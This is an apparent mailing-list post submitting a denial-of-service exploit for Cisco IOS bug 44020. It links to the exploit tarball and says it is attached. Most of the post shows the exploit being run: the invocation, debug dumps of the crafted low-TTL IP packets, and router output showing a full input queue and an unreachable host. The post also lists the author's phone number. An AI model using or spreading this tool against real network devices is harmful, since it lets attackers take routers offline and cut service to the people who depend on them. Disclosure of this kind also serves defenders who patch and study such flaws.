Cisco IOS exploit (44020)

Hi,

I'd like to submit a DoS attack against the recently found bug in
almost all Cisco IOS versions (Cisco document ID 44020).

The exploit can be found here (and it is included as attachment):

http://www.elxsi.de/cisco-bug-44020.tar.gz


This exploit is NOT broken (like the shadowchode.tar.gz exploit for example):

Example:

bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.


User Access Verification

Username: 103
Password: ******


1003>show version
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE 
(fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
Image text-base: 0x02004000, data-base: 0x0259733C

ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1)
BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEASE 
SOFTWARE (fc1)

1003 uptime is 6 minutes
System restarted by power-on
System image file is "flash:c1000-bnsy56-mz.120-22.bin"

cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory.
Processor board ID 03305903
Bridging software.
X.25 software, Version 3.0.0.
Basic Rate ISDN software, Version 1.1.
1 Ethernet/IEEE 802.3 interface(s)
1 ISDN Basic Rate interface(s)
7K bytes of non-volatile configuration memory.

bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
DEBUG: Hops: 1
DEBUG: Protocol: 53
DEBUG: Checksum: 47299
DEBUG:  45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 61909
DEBUG:  45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 55515
DEBUG:  45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 53
DEBUG: Checksum: 10618
DEBUG:  45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 77
DEBUG: Checksum: 40137
DEBUG:  45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
<snip>
...
<snip>
bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
telnet: Unable to connect to remote host: No route to host

If I login via term, I can see the following:

Press RETURN to get started!


00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, changed stp
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed staten
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed staten
00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
00:00:39: %SYS-5-RESTART: System restarted --
Cisco Internetwork Operating System Software
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up
1003>en
Password: ******
1003#show Interfaces Ethernet 0
Ethernet0 is up, line protocol is up
  Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
  Internet address is 192.168.1.123/24
  MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
  Encapsulation ARPA, loopback not set, keepalive set (10 sec)
  ARP type: ARPA, ARP Timeout 04:00:00
  Last input 00:02:04, output 00:00:04, output hang never
  Last clearing of "show interface" counters never
  Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
               ^^
               ||
               The input queue is full :)


Cheers,
Martin Kluge
-- 
Name      : Martin Kluge
email     : martin@xxxxxxxxxx
Phone     : +49 160 1515182
Projects  : http://www.aa-security.de
GPG Key   : http://www.elxsi.de/key.pub

cisco-bug-44020.tar.gz
Description: application/tar-gz

pgpHPLHaHM2hX.pgp
Description: PGP signature